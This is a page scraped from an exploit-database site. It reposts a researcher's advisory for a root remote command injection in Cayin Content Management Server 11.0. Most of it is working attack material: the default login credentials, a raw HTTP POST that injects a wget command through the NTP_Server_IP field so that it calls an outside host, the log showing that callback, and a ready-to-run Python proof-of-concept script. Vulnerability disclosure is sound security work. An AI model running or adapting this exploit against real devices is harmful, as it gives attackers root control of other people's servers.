0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cayin Content Management Server 11.0 - Remote Command Injection (root) Vulnerability
# Title: Cayin Content Management Server 11.0 - Remote Command Injection (root) # Author:LiquidWorm # Vendor: https://www.cayintech.com # CVE: N/A Cayin Content Management Server 11.0 Root Remote Command Injection Vendor: CAYIN Technology Co., Ltd. Product web page: https://www.cayintech.com Affected version: CMS-SE v11.0 Build 19179 CMS-SE v11.0 Build 19025 CMS-SE v11.0 Build 18325 CMS Station (CMS-SE-LXC) CMS-60 v11.0 Build 19025 CMS-40 v9.0 Build 14197 CMS-40 v9.0 Build 14099 CMS-40 v9.0 Build 14093 CMS-20 v9.0 Build 14197 CMS-20 v9.0 Build 14092 CMS v8.2 Build 12199 CMS v8.0 Build 11175 CMS v7.5 Build 11175 Summary: CAYIN Technology provides Digital Signage solutions, including media players, servers, and software designed for the DOOH (Digital Out-of-home) networks. We develop industrial-grade digital signage appliances and tailored services so you don't have to do the hard work. Desc: CAYIN CMS suffers from an authenticated OS semi-blind command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user through the 'NTP_Server_IP' HTTP POST parameter in system.cgi page. Tested on: Apache/1.3.42 (Unix) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5570 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php 15.05.2020 --- Session created with default credentials (webadmin:bctvadmin). HTTP POST Request: ----------------- POST /cgi-bin/system.cgi HTTP/1.1 Host: 192.168.1.3 Content-Length: 201 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Smith Origin: http://192.168.1.3 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.3/cgi-bin/system.cgi Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957 Connection: close save_system: 1 system_date: 2020/5/16 06:36:48 TIMEZONE: 49 NTP_Service: 1 NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk) TEST_NTP: 測試 reboot1: 1 reboot_sel1: 4 reboot_sel2: 1 reboot_sel3: 1 font_list: ZH_TW Request recorder @ ZSL: ----------------------- Origin of HTTP request: 192.168.1.3:61347 HTTP GET request to vrfy.zeroscience.mk: GET / HTTP/1.0 User-Agent: MyVoiceIsMyPassportVerifyMe Host: vrfy.zeroscience.mk Accept: */* Connection: Keep-Alive PoC script: ----------- import requests url = "http://192.168.1.3:80/cgi-bin/system.cgi" cookies = {"cy_lang": "ZH_TW", "cy_us": "67176fd7d3d05812008", "cy_en": "c8bef8607e54c99059cc6a36da982f9c009", "WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST", "WEB_STR_SYSTEM": "SYSTEM_SETTING", "cy_cgi_tp": "1591206269_15957"} headers = {"Cache-Control": "max-age=0", "Origin": "http://192.168.1.3", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Smith", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.1.3/cgi-bin/system.cgi", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} data = {"save_system": "1", "system_date": "2020/5/16 06:36:48", "TIMEZONE": "49", "NTP_Service": "1", "NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)", # `cmd` or &cmd& "TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6", "reboot1": "1", "reboot_sel1": "4", "reboot_sel2": "1", "reboot_sel3": "1", "font_list": "ZH_TW"} requests.post(url, headers=headers, cookies=cookies, data=data) # 0day.today [2024-09-28] #